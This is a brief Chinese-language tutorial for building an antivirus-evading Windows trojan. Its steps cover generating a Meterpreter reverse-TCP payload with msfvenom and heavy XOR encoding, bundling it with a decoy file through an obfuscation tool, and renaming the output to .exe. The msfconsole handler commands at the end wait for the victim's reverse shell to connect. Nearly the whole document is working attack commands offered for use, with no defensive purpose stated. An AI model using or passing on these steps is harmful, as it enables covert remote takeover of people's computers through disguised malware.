生产shellcode
## 基础环境
1、kali
## shellcode生产命令
msfvenom -p windows/meterpreter/reverse_tcp -e x64/xor_dynamic -i 200 LHOST=192.168.199.186 LPORT=22335 -f exe > yunan.exe
免杀环境安装
## 免杀工具地址:https://github.com/Ed1s0nZ/cool
1、go环境安装
安装Go环境,版本要1.17及以上
如果是首次安装Go环境,安装完毕后要配置代理,执行以下这两条命令:
2、go环境配置
go env -w GO111MODULE=on
go env -w GOPROXY=https://goproxy.io,direct
go install mvdan.cc/garble@latest
3、捆绑免杀
下载本项目到D盘根目录,文件夹名字改为cool;exe可执行文件改名为:cool
运行cool.exe;
访问 http://127.0.0.1:9000 。
4、材料准备
1、将生成的shellcode exe 和捆绑的文件放在cool的目录下
5、选择AESshellcode2进行捆绑
1、选择语言ruby
2、输入shellcode的IP地址及端口号
3、选择捆绑自定义木马、自定义文件
4、生成
5、下载生成后的文件,将txt后缀改成exe
开启监听,等待上线
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.199.181
msf6 exploit(multi/handler) > set lport 22335
msf6 exploit(multi/handler) > run
等待上线即可